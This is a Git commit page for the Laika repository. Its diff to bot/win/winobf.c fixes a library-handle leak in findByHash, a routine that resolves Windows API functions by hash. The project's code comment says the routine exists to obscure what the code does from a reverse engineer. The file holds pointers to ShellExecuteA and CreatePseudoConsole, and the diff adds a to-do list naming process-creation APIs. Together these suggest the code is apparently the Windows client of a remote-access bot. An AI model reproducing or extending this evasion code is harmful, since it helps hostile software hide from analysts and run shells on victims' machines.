CPunch
/
Laika
mirror of https://github.com/CPunch/Laika.git
1
0
Fork 0
Code Issues Projects Releases Wiki Activity

Use FreeLibrary(), not CloseHandle()

This commit is contained in:
CPunch 2022-07-08 14:43:13 -05:00
parent 4d931f28cb
commit 4c8fef7d64
1 changed files with 14 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

15
bot/win/winobf.c
View File

@ -86,6 +86,13 @@ void *findByHash(LPCSTR module, uint32_t hash)
if ((hLibrary = LoadLibraryA(module)) == NULL)
return NULL;
/*
the rest of this function just does the same thing GetProcAddress() does, but using
our hash function to find the right function. this is also more obfuscated to the
REer, however they would probably immediately recognize what this function is doing
just from the LoadLibraryA() call.
*/
/* grab DOS headers & verify */
pDOSHdr = (PIMAGE_DOS_HEADER)hLibrary;
if (pDOSHdr->e_magic != IMAGE_DOS_SIGNATURE)
@ -120,7 +127,7 @@ void *findByHash(LPCSTR module, uint32_t hash)
_findByHashFail:
/* function was not found, close the library handle since we don't need it anymore */
CloseHandle(hLibrary);
FreeLibrary(hLibrary);
return NULL;
}
@ -131,6 +138,12 @@ _findByHashFail:
_ShellExecuteA oShellExecuteA;
_CreatePseudoConsole oCreatePseudoConsole;
/* todo api:
ClosePseudoConsole
CreateProcessA
GetEnvironmentVariable
*/
void laikaO_init()
{
uint32_t hash;